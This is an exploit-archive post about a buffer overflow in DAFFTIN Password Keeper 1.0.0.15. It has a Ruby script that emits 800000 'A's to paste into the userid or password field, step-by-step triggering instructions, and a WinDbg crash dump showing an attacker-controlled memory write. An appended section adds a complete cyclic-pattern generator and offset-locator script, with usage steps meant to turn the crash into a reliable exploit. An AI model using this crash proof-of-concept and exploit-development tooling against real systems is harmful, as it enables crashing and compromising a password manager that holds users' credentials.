DAFFTIN Password Keeper 1.0.0.15
Source: vfocus.net  Author: Richard  Published: 2010-04-02
# Exploit Title: DAFFTIN Password Keeper 1.0.0.15
# Date: 01/04/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/download_222389.html
# Version: 1.0.0.15
# Platform Tested on: Windows Xp Sp3 & Sp2

#code
#!/usr/bin/env ruby
# Emit 800000 "A"s; paste the output into the userid or password box (steps below).
test = "A" * 800000
puts test

Hey guys, I managed to get an access violation when executing 41414141, but only after about 700000 "A"s. It seems to cause an access violation after 60000 but only hits our code after roughly 700000. I have not managed to exploit this as the offset keeps changing; can anyone look into this and see if there is a way? Here is a dump of the debugging. To test this, open up the application, File -> New, save as test, and choose a password, e.g. test. Then, once you're in the application, go to Accounts -> New, set the title to test, then print the 700000 "A"s into the userid
or password box (works for both), then click OK.


(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0013ae41 ebx=00ebbff0 ecx=00e00ab8 edx=00ec4000 esi=00ebc030 edi=00ec8004
eip=7c80bea9 esp=0013aeb4 ebp=0013aed8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!lstrcpyA+0x18:
7c80bea9 8802            mov     byte ptr [edx],al          ds:0023:00ec4000=??
0:000> g
(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00ec4000 ebx=00ebbff0 ecx=35950941 edx=00ebc031 esi=00ebc030 edi=00ec8004
eip=7c80be64 esp=0013aeb8 ebp=0013aedc iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
kernel32!lstrlen+0x1e:
7c80be64 8a08            mov     cl,byte ptr [eax]          ds:0023:00ec4000=??
0:000> g
(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00ec2a38 ecx=41414141 edx=41414141 esi=00010008 edi=00529638
eip=0047422a esp=0013ae30 ebp=0052963c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\DAFFTIN Password Keeper\PassKeeper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\DAFFTIN Password Keeper\PassKeeper.exe
PassKeeper+0x7422a:
0047422a 8902            mov     dword ptr [edx],eax  ds:0023:41414141=????????
0:000> dd eip
0047422a  50890289 90c35b04 158b9090 00529648
0047423a  4a8b10eb 72c13b08 0c4a0307 1672c13b
0047424a  fa81128b 00529648 05c7e875 005295e8
0047425a  00000003 c28bd233 8b5390c3 04e983ca
0047426a  83011c8d 0f7c10fa 000703c7 d18b8000
0047427a  0001b9e8 83c35b00 0c7c04fa c981ca8b
0047428a  80000002 0b890889 05ffc35b 005295d8
0047429a  ea83d08b 81128b04 fffffce2 04ea837f
0:000> dd eax
41414141  ???????? ???????? ???????? ????????
41414151  ???????? ???????? ???????? ????????
41414161  ???????? ???????? ???????? ????????
41414171  ???????? ???????? ???????? ????????
41414181  ???????? ???????? ???????? ????????
41414191  ???????? ???????? ???????? ????????
414141a1  ???????? ???????? ???????? ????????
414141b1  ???????? ???????? ???????? ????????
0:000> dd esp
0013ae30  00ec2a38 004746ce 0013ae6c 0013aecc
0013ae40  00ebc030 00010008 00474870 0013aea8
0013ae50  00474894 0013ae6c 0013aecc 00ebc030
0013ae60  00010001 00000000 00000000 0013ae84
0013ae70  004f098f 00010001 00474718 004748a8
0013ae80  00474c1c 0013ae90 004f088d 00010001
0013ae90  0013aed0 004f0112 00010001 00ec8004
0013aea0  00ebc030 00ebbff0 0013af2c 004f1257 
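The third access violation in the dump is the interesting one: at PassKeeper+0x7422a the instruction `mov dword ptr [edx],eax` executes with both eax and edx equal to 41414141, i.e. the overlong userid/password has supplied both the value and the destination of a 4-byte write. A flat run of "A"s cannot tell you which part of the 700000-byte input reached those registers, which is what makes the offset hard to pin down. The Ruby script below is an added example written for this page, not part of Richard Leahy's post or of the DAFFTIN software; the helper names pattern_create, pattern_offsets, reg_to_bytes and locate_registers are hypothetical. It replaces the "A"s with a Metasploit-style cyclic pattern and maps a WinDbg register value (little-endian, as printed in the dump) back to offsets in the input. The pattern repeats every 20280 bytes, so a 700000-byte buffer holds about 35 copies; the script reports every candidate offset instead of only the first, and comparing the candidates across two runs shows whether the offset really moves or only the buffer's address does.

```ruby
#!/usr/bin/env ruby
# Added example for this page (hypothetical helpers, not the original exploit code).
# Builds a cyclic pattern "Aa0Aa1Aa2..." and maps crash register values back to
# offsets inside the oversized userid/password string.

UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a
# One full period of the pattern: 26 * 26 * 10 triples of 3 bytes = 20280 bytes.
PATTERN_PERIOD = UPPER.product(LOWER, DIGIT).map(&:join).join.b
PERIOD = PATTERN_PERIOD.size

# Return the first +length+ bytes of the pattern; beyond PERIOD it simply repeats.
def pattern_create(length)
  (PATTERN_PERIOD * (length / PERIOD + 1))[0, length]
end

# Turn a 32-bit register value as WinDbg prints it (e.g. "41414141") into the
# 4 bytes in memory order. 'V' = unsigned 32-bit little-endian.
def reg_to_bytes(hex)
  [hex.to_i(16)].pack('V')
end

# Every offset in a +length+-byte pattern at which the 4-byte +needle+ occurs.
# Because the pattern repeats, a 700000-byte buffer contains the same 4 bytes
# roughly 35 times; all candidates are returned rather than one guess.
def pattern_offsets(needle, length)
  haystack = PATTERN_PERIOD + PATTERN_PERIOD[0, 3]   # +3 bytes so a match across the wrap is found
  first = haystack.index(needle.b)
  return [] if first.nil?
  first.step(length - needle.size, PERIOD).to_a
end

REG_RE = /\b(e(?:ax|bx|cx|dx|si|di|bp|sp|ip))=([0-9a-f]{8})\b/

# Parse one WinDbg register line and report, per register, the offsets whose
# 4 pattern bytes would have produced that value. Registers holding values
# that are not from the pattern (stack/heap addresses, 41414141) are dropped.
def locate_registers(line, length)
  line.scan(REG_RE).each_with_object({}) do |(reg, hex), out|
    offs = pattern_offsets(reg_to_bytes(hex), length)
    out[reg] = offs unless offs.empty?
  end
end

if __FILE__ == $0
  case ARGV.size
  when 1 then print pattern_create(ARGV[0].to_i)          # cyclic.rb 700000 > payload.txt
  when 2 then p locate_registers(ARGV[1], ARGV[0].to_i)   # cyclic.rb 700000 "eax=... edx=..."
  else warn "usage: #{$0} LENGTH [WINDBG_REGISTER_LINE]"
  end
end
```

Usage: generate the payload with `ruby cyclic.rb 700000 > payload.txt`, paste it into the userid box as described above, and when the `mov dword ptr [edx],eax` fault hits, pass the `eax=... edx=...` line from WinDbg as the second argument. Since both the written value (eax) and the target address (edx) come from the input, two independent offsets are expected; if either one shifts by a constant between runs, that is the variability the author describes and it has to be accounted for in the pattern placement rather than in the address.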



 